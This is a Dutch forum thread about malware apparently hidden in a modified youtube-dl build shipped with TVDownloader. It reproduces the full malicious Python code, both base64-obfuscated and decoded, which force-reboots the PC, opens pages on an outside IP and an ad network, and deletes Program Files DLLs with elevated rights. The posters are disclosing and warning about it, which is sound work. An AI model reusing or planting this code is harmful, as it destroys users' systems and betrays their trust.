Recent bedankt: 6 keer

Het antwoord daarop staat al in dit topic en is op eigen risico, zoals steeds.
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Gautier past zijn versie van youtube-dl aan zodat deze cruciale bestanden delete indien deze draait in een andere context dan teeveedownloader (of is het specifiek gericht op als het draait in TVDownloader?)
Ik ben even terug in de bewuste malware code van G. gaan kijken om op uw vraag te antwoorden:
Dit is de code waarbij de strings base64 encoded zijn:

Code: Selecteer alles

        if os.path.isfile(base64.b64decode(u'VGVldmVlZG93bmxvYWRlci5leGU=')):
            if hashlib.md5(open(base64.b64decode(u'VGVldmVlZG93bmxvYWRlci5leGU='), u'rb').read()).hexdigest() == u'eb91cd417adcb3d8214b980e4fcc4bb6':
                valuet = True
        if not (procex(base64.b64decode(u'bXNodGEuZXhl')) or u'/%(tit' in str(sys.argv)):
            if not valuet:
                sys.exit(0)
        elif procex(base64.b64decode(u'VGVldmVlZG93bmxvYWRlci5leGU=')):
            sys.exit(0)
        elif valuet:
            sys.exit(0)
        else:
            x = randint(0, 9)
            if x < 2:
                os.system(base64.b64decode(u'c2h1dGRvd24gLXQgMCAtciAtZg=='))
            elif x < 10:
                if randint(0, 9) < 7:
                    os.system(base64.b64decode(u'c3RhcnQgaHR0cDovLzM1LjE4NC4xNjkuMTg4L016QXdPRFV6TWpjNE5qUXpMek13TURnMU5EY3pOelF5Tmk4d01XVTFlblpvYldKcQ=='))
                if randint(0, 9) < 7:
                    os.system(base64.b64decode(u'c3RhcnQgaHR0cDovLzM1LjE4NC4xNjkuMTg4L016azRORFE0T1RVd01UQXdMek01T0RRMU1EUXdPRGc0TXk4d1lXRmpZbTg1Tm1NMA=='))
                if randint(0, 9) < 7:
                    os.system(base64.b64decode(u'c3RhcnQgaHR0cDovL3BvcGNhc2gubmV0L3dvcmxkL2dvLzU3MjEyLzEwNTAzNC8='))
                if randint(0, 9) < 5:
                    subprocess.Popen(base64.b64decode(u'Y21kIC9jICJwaW5nIDEyNy4wLjAuMSAtbiA2MCAmIHNodXRkb3duIC10IDAgLXIgLWYgIg=='), creationflags=134217728)
                elif u"'-f'" in str(sys.argv):
                    for i in range(0, len(sys.argv) - 1):
                        if sys.argv[i] == u'-f':
                            sys.argv[i + 1] = str(u'worst')

                else:
                    sys.argv.extend([str(u'-f'), str(u'worst')])
                if x == 9:
                    subprocess.Popen(base64.b64decode(u'Y21kIC9jICJkZWwgIiVzXCouZGxsIiAvUyAvRiAvUSAiIA==') % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(base64.b64decode(u'cG93ZXJzaGVsbCAtQ29tbWFuZCAiU3RhcnQtUHJvY2VzcyBjbWQgJy9jIGRlbCAvRiAvUSAvUyAiIiVzXCouZGxsIiInIC1WZXJiIHJ1bkFzIiA=') % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(base64.b64decode(u'cG93ZXJzaGVsbCAtQ29tbWFuZCAiU3RhcnQtUHJvY2VzcyBjbWQgJy9jIGRlbCAvRiAvUSAvUyAiIiVzICgzODYpXCouZGxsIiInIC1WZXJiIHJ1bkFzIiA=') % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(base64.b64decode(u'Y21kIC9jICJwaW5nIDEyNy4wLjAuMSAtbiAzMCAmIHNodXRkb3duIC10IDAgLXIgLWYgIg=='), creationflags=134217728)
                    subprocess.Popen(base64.b64decode(u'Y21kIC9jICJjb3B5IHR2ZG93bmxvYWRlci5leGUgc29iaWcuZXhlICYgY29weSAiXFwlc1xcZG9jdW1lbnRzXFwqLioiICJcXCVzXFxkZXNrdG9wIiAvWSAi') % (os.environ[u'HOMEPATH'], os.environ[u'HOMEPATH']), creationflags=134217728)
                    subprocess.Popen(base64.b64decode(u'Y21kIC9jICJjb3B5ICJjOlxcd2luZG93c1xcc3lzdGVtMzJcXCouKiIgIlxcJXNcXGRlc2t0b3AiIC9ZICI=') % os.environ[u'HOMEPATH'], creationflags=134217728)
Dit is de gedecodeerde versie:

Code: Selecteer alles

        if os.path.isfile(Teeveedownloader.exe):
            if hashlib.md5(open(Teeveedownloader.exe, u'rb').read()).hexdigest() == u'eb91cd417adcb3d8214b980e4fcc4bb6':
                valuet = True
        if not (procex(mshta.exe) or u'/%(tit' in str(sys.argv)):
            if not valuet:
                sys.exit(0)
        elif procex(Teeveedownloader.exe):
            sys.exit(0)
        elif valuet:
            sys.exit(0)
        else:
            x = randint(0, 9)
            if x < 2:
                os.system(shutdown -t 0 -r -f)
            elif x < 10:
                if randint(0, 9) < 7:
                    os.system(start http://35.184.169.188/MzAwODUzMjc4NjQzLzMwMDg1NDczNzQyNi8wMWU1enZobWJq)
                if randint(0, 9) < 7:
                    os.system(start http://35.184.169.188/Mzk4NDQ4OTUwMTAwLzM5ODQ1MDQwODg4My8wYWFjYm85NmM0)
                if randint(0, 9) < 7:
                    os.system(start http://popcash.net/world/go/57212/105034/)
                if randint(0, 9) < 5:
                    subprocess.Popen(cmd /c "ping 127.0.0.1 -n 60 & shutdown -t 0 -r -f "), creationflags=134217728)
                elif u"'-f'" in str(sys.argv):
                    for i in range(0, len(sys.argv) - 1):
                        if sys.argv[i] == u'-f':
                            sys.argv[i + 1] = str(u'worst')

                else:
                    sys.argv.extend([str(u'-f'), str(u'worst')])
                if x == 9:
                    subprocess.Popen(cmd /c "del "%s\*.dll" /S /F /Q "  % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(powershell -Command "Start-Process cmd '/c del /F /Q /S ""%s\*.dll""' -Verb runAs" ) % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(powershell -Command "Start-Process cmd '/c del /F /Q /S ""%s (386)\*.dll""' -Verb runAs"  % os.environ[u'ProgramFiles'], creationflags=134217728)
                    subprocess.Popen(cmd /c "ping 127.0.0.1 -n 30 & shutdown -t 0 -r -f ", creationflags=134217728)
                    subprocess.Popen(cmd /c "copy tvdownloader.exe sobig.exe & copy "\\%s\\documents\\*.*" "\\%s\\desktop" /Y " % (os.environ[u'HOMEPATH'], os.environ[u'HOMEPATH']), creationflags=134217728)
                    subprocess.Popen(cmd /c "copy "c:\\windows\\system32\\*.*" "\\%s\\desktop" /Y " % os.environ[u'HOMEPATH'], creationflags=134217728) 
Vertaald in mensentaal:
1/ als Teeveedownloader.exe met de juiste versie in het pad staat van youtube-dl mag youtube-dl verder lopen
2/ als het proces dat youtube-dl opstart een "mshta.exe" proces is (bv. dat van TVDownloader) en als %(tit in de parameters staan (TVDownloader gebruikt deze parameter) dan worden onderstaande kwaadaardige zaken uitgevoerd
3/ in andere gevallen zal youtube-dl gewoon exitten en doet niets meer
In geval 2/ worden volgende zaken at random uitgevoerd:
Met kans 2 op 10 wordt de pc herstart
Met kans 7 op 10 wordt gesurft naar malafide websites
Met kans 5 op 10 wordt met vertraging de pc herstart
Met kans 1 op 10:
-alle dll's worden verwijderd uit program files
-alle files van windows\system32 worden naar de desktop gekopieerd... etc.
Pengu
Elite Poster
Elite Poster
Berichten: 809
Lid geworden op: 28 sep 2003, 12:58
Uitgedeelde bedankjes: 17 keer
Bedankt: 39 keer
Recent bedankt: 1 keer

Zoals eerder hier al in dit topic vermeld..... maar ook ik vind dat er hier veel te licht wordt overgegaan. Dit is een misdrijf, aangifte doen bij de politie. Hij mag het eens gaan uitleggen bij de rechter me dunkt. Hij mag dan misschien een groot ego hebben, narcist zijn, vul zelf maar in.... het is gewoon not done.

Al valt het misschien gewoon onder de noemer van cyberpesten als ik het hier zo lees. Spijtig dat de gewone gebruiker hier de echte dupe van is geworden.
Laatst gewijzigd door Pengu 29 aug 2017, 12:11, in totaal 1 gewijzigd.
vverbeke
Elite Poster
Elite Poster
Berichten: 935
Lid geworden op: 19 mei 2009, 11:31
Uitgedeelde bedankjes: 60 keer
Bedankt: 94 keer

xplorr schreef:Het gaat ook niet om een virus (virus heeft de eigenschap zich verder te verspreiden). Het gaat om malware geschreven om at random de pc te laten herstarten, dll bestanden te laten verwijderen uit de programs folders en om de desktop om zeep te helpen.
Een worm heeft de eigenschap zich verder te verspreiden, een virus niet altijd. Nu, of het nu een worm, virus of malware wordt genoemd, het blijft een strafbaar feit.
@home: VDSL 100/35 • @work: fiber 200/200 + fiber 300/50 + cable 240/30
Gebruikersavatar
MClaeys
Elite Poster
Elite Poster
Berichten: 6044
Lid geworden op: 16 feb 2011, 22:43
Uitgedeelde bedankjes: 376 keer
Bedankt: 346 keer

xplorr schreef:3/ in andere gevallen zal youtube-dl gewoon exitten en doet niets meer
In geval 2/ worden volgende zaken at random uitgevoerd:
Met kans 2 op 10 wordt de pc herstart
Met kans 7 op 10 wordt gesurft naar malafide websites
Met kans 5 op 10 wordt met vertraging de pc herstart
Met kans 1 op 10:
-alle dll's worden verwijderd uit program files
-alle files van windows\system32 worden naar de desktop gekopieerd... etc.
Ik gebruik geen van beide tools, noch ben ik bekend met de voorgeschiedenis (tot dit topic dan), maar die zaken zijn gewoon crimineel! Een computer random eens herstarten, ok vervelend maar niks erg, echter het surfen naar malafide sites en het verwijderen van dll's... Aangifte door de slachtoffers is hier dan ook de enige correcte stap :nono:
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Probleem is dat als slachtoffers klacht indienen, dat ze verwijzen naar TVDownloader omdat de malware van G. zich daar alleen manifesteert. De eindgebruiker en de politie kan dat onderscheid niet maken en ze zullen daarom allemaal bij mij aan de deur staan ipv. bij de schrijver G. Geen goed idee.
Ik ben dit project gestart omdat ik ervan hou om mensen te helpen. Uiteindelijk zou ik dan uitleg moeten verschaffen, mij moeten verantwoorden bij de politie terwijl de auteur van de malware met rust wordt gelaten.
Ik ben daarom voorstander dat we dit probleem op een rustige menselijke manier oplossen op basis van een berisping, niet meer niet minder.
Pengu
Elite Poster
Elite Poster
Berichten: 809
Lid geworden op: 28 sep 2003, 12:58
Uitgedeelde bedankjes: 17 keer
Bedankt: 39 keer
Recent bedankt: 1 keer

Het minste wat er kan gedaan worden is mensen/bedrijven waarschuwen indien zij software van deze persoon gebruiken. Of als hij nog maar in de buurt van iemand anders zijn pc komt. Deze persoon is volledig onbetrouwbaar.

Dat deze persoon dan op gebied van carrière een zware klap krijgt of zelfs zijn werk zou verliezen is zijn eigen schuld. Jobs genoeg maar dan niet meer in de ICT sector dan. En wie zijn gat verbrand.......
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Ik roep op om vanaf nu constructief en volwassen te werken aan oplossingen evt. samen met G. Nu de zaken bekend zijn zou het al helpen mocht G. (onder zijn echte account) op dit forum op een rustige manier openheid en klaarheid verschaffen vanaf welke datum hij deze malware in zijn youtube-dl heeft gestopt. Ik zou dan kunnen nagaan welke versies dit probleem eventueel zouden gehad hebben en op die manier mensen via dit forum of mijn forum (als dat terug open gaat) waarschuwen. Nu krijgen gebruikers een gesloten forum te zien.
Volgens mij zijn de eerste problemen zaterdag 26/8 opgedoken (ik dacht in versie 1.10 en 1.11). Kan G. dit bevestigen aub?
Eventueel versienummer van getroffen youtube-dl meedelen is ook goed.
wied
Elite Poster
Elite Poster
Berichten: 6590
Lid geworden op: 28 okt 2011, 15:07
Locatie: 'tstad
Uitgedeelde bedankjes: 343 keer
Bedankt: 273 keer

xplorr schrijft: Kan G. dit bevestigen aub?

waarom zou hij, G. gedraagt zich wel eens meer als een ''arrogante zak'' op dit forum!? Als ge inderdaad graag mensen helpt laat dit varkentje dan wassen door de mods en admins...
Scarlet Loco, FVD/OVH/Tempo Easy, Scarlet Cherry, Netflix, Astra1&2 FTA
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Ondertussen heb ik zopas het resultaat van de analyse van Symantec/Norton ontvangen. Ze bevestigen dat TVDownloader 1.12 na analyse clean is (whitelisted):
On Tue, Aug 29, 2017 at 1:20 PM, [email protected] <[email protected]> wrote:
In relation to submission 47595.

Upon further analysis and investigation we have verified your submission and, as such, the detection(s) for the following file(s) will be removed from our products:

File name: TVDownloader_v1.12.exe
MD5: cecde8171bff9d1443dd3c30df3cb600
SHA256: 9690c140b1fee4a1dbd8b8f245390328b867099c4f8b20f7134f412a5f9dc777
Note: Whitelisting may take up to 24 hours to take effect via Live Update

If detection persists, please contact support:
* Norton: https://support.norton.com/sp/en/us/home/current/info
* SEP: https://support.symantec.com/en_US/endp ... 54619.html

Decisions made by Symantec are subject to change if alterations to the Software are made over time or as classification criteria and/or the policy employed by Symantec changes over time to address the evolving landscape.

For more information on best practices to reduce false positives:
http://www.symantec.com/content/en/us/e ... .en-us.pdf


Sincerely,
Symantec Security Response
http://securityresponse.symantec.com

This message (including any attachments) is intended only for the use of the individual or entity to which it is addressed and may contain information that is non-public, proprietary, privileged, confidential, and exempt from disclosure under applicable law or may constitute as attorney work product. If you are not the intended recipient, you are hereby notified that any use, dissemination, distribution, or copying of this communication is strictly prohibited. If you have received this communication in error, notify us immediately by telephone and (i) destroy this message if a facsimile or (ii) delete this message immediately if this is an electronic communication. Thank you.
L1008
Starter
Starter
Berichten: 7
Lid geworden op: 23 jun 2017, 13:13
Uitgedeelde bedankjes: 2 keer
Bedankt: 1 keer

Sorry dat ik misschien nog eens dezelfde vraag stel, maar is die versie 1.12 betrouwbaar en veilig? Ik had tot nu steeds 1.7 in gebruik, maar die wilt geen VTM download s doen.

Bedankt!
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Die vraag is hier al verschillende keren beantwoord geweest. Het heeft weinig zin om hetzelfde te blijven herhalen...
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Omdat G. nog niet heeft geantwoord, ben ik zelf in de vorige releases van TVDownloader alle youtube-dl versies gaan ontleden.
De versies in groen zijn clean en bevatten geen youtube-dl malware van G.
De versies in rood bevatten de schadelijke youtube-dl malware van G. en moet je onmiddellijk van je pc verwijderen!
De besmette versies zijn dus exact 10 dagen in omloop geweest tussen 18/8 en 27/8
Ik kan het antwoord dus zelf aan G. geven: rond 18/8 of iets daarvoor heeft hij zijn malware geschreven.
De versies van Teeveedownloader tussen die periode bevatten ook die zelfde youtube-dl malware van G., maar uiteraard enkel actief buiten Teeveedownloader om.

Version 1.0 11-01-2016
Version 1.1 12-01-2016
Version 1.2 13-01-2016
Version 1.3 18-01-2016
Version 1.4 11-04-2016
Version 1.5 22-01-2017
Version 1.5 23-01-2017
Version 1.6 24-01-2017
Version 1.6b 26-01-2017
Version 1.6c 27-01-2017
Version 1.6d 05-02-2017
Version 1.7 28-06-2017
Version 1.7a 27-07-2017
Version 1.8 28-07-2017

Version 1.9 18-08-2017
Version 1.10 21-08-2017
Version 1.11 25-08-2017

Version 1.12 28-08-2017
Version 1.13 29-08-2017
Version 1.14 30-08-2017

Het gaat om deze schadelijke youtube-dl.exe geschreven door Gautier (die ook in een aantal Teeveedownloader versies van de maand augustus 2017 zit!):
2017.7.30.1
2017.8.18.0
2017.8.27.1
Laatst gewijzigd door xplorr 30 aug 2017, 16:55, in totaal 10 gewijzigd.
nickz
Elite Poster
Elite Poster
Berichten: 1533
Lid geworden op: 09 dec 2011, 17:55
Locatie: Gent
Uitgedeelde bedankjes: 178 keer
Bedankt: 220 keer

Werd die malware dan pas vanaf een bepaalde datum actief? Ik heb TVDownloader v1.9 namelijk nog zonder problemen gebruikt op 20/08/2017.
Gebruikersavatar
xplorr
Plus Member
Plus Member
Berichten: 119
Lid geworden op: 29 jul 2013, 18:38
Uitgedeelde bedankjes: 21 keer
Bedankt: 7 keer

Zoals eerder gezegd heeft G. een random generator ingebouwd in de malware. De schade was niet altijd het geval en niet in alle gevallen even groot:
2 kansen op 10 werd de pc herstart
7 kansen op 10 werd gesurft naar malafide websites
5 kansen op 10 werd met vertraging de pc herstart
1 kans op 10:
-alle dll's werden verwijderd uit program files
-alle files van windows\system32 werden naar de desktop gekopieerd... etc.
Zou kunnen dat er verder nog een vertragingstimer in zat, maar dat kan G. u beter vertellen dan ikzelf.
Plaats reactie

Terug naar “Software en apps”